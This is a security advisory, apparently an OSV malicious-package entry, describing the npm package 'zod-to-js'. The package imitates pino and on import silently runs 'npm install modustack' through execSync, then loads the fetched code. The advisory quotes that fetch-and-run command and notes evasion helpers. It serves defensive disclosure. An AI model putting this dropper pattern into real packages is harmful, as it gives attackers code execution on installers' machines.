MAL-2026-4740

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (370d1632254cb5b5dbd394992054b6c0e943a6fb758ab70f470c059ee734b9c0) The package is published as 'zod-to-js' but ships a copy of pino's source tree (main entry `pino.js`, lib/proto.js, lib/levels.js, pino docs/README) with a description copy-pasted from inquirer and homepage `https://getpino.io` — a deceptive identity unrelated to its declared name. On `require('zod-to-js')`, the load chain reaches `lib/writer.js`, which attempts `require('modustack')` and, on failure, executes `execSync('npm install modustack --no-warnings --no-save --no-progress --loglevel silent', { windowsHide: true })` followed by `require('../../modustack/pino.js')`. The install is unpinned, has no integrity check, and runs whatever bytes the attacker currently publishes under the `modustack` name. The same file contains additional staging scaffolding — a `String.fromCharCode`-based string builder and a `getMacAddress()` helper that enumerates non-internal interface MACs but is unreferenced in the visible code path — consistent with a loader/dropper shaped for evasion. Any consumer that imports this package triggers attacker-controlled code execution on the installer's machine.